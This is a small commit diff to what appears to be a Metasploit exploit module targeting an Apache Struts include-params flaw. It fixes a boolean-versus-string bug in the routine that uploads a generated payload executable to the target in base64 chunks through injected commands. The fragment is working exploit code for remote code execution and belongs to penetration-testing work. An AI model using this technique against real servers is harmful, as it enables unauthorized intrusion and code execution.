boolean issue fix

Console · Console · commit eb4162d41bbd · 2013-05-30T18:15:33.000+01:00
diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb
@@ -108,7 +108,7 @@ def exploit
 		#Set up generic values.
 		@payload_exe = rand_text_alphanumeric(4+rand(4))
 		pl_exe = generate_payload_exe
-		append = 'false'
+		append = false
 		#Now arch specific...
 		case target['Platform']
 		when 'linux'
@@ -138,7 +138,8 @@ def exploit
 		# Now with all the arch specific stuff set, perform the upload.
 		# Need to calculate amount to allocate for non-dynamic parts of the URL.
 		# Fixed strings are tokens used for substitutions.
-		sub_from_chunk = append.length + ( @java_upload_part_cmd.length - "FILENAME".length - "APPEND".length - "BUFFER".length )
+		append_length = append ? "true".length : "false".length # Gets around the boolean/string issue
+		sub_from_chunk = append_length + ( @java_upload_part_cmd.length - "FILENAME".length - "APPEND".length - "BUFFER".length )
 		sub_from_chunk += ( @inject.length - "CMD".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length
 		case datastore['HTTPMETHOD']
 			when 'GET'
@@ -162,8 +163,9 @@ def exploit
 		register_files_for_cleanup(@payload_exe)
 	end
 
-	def java_upload_part(part, filename, append = 'false')
+	def java_upload_part(part, filename, append = false)
 		cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)
+		append = append ? "true" : "false" # converted for the string replacement.
 		cmd = cmd.gsub!(/APPEND/,append)
 		cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))
 		execute_command(cmd)
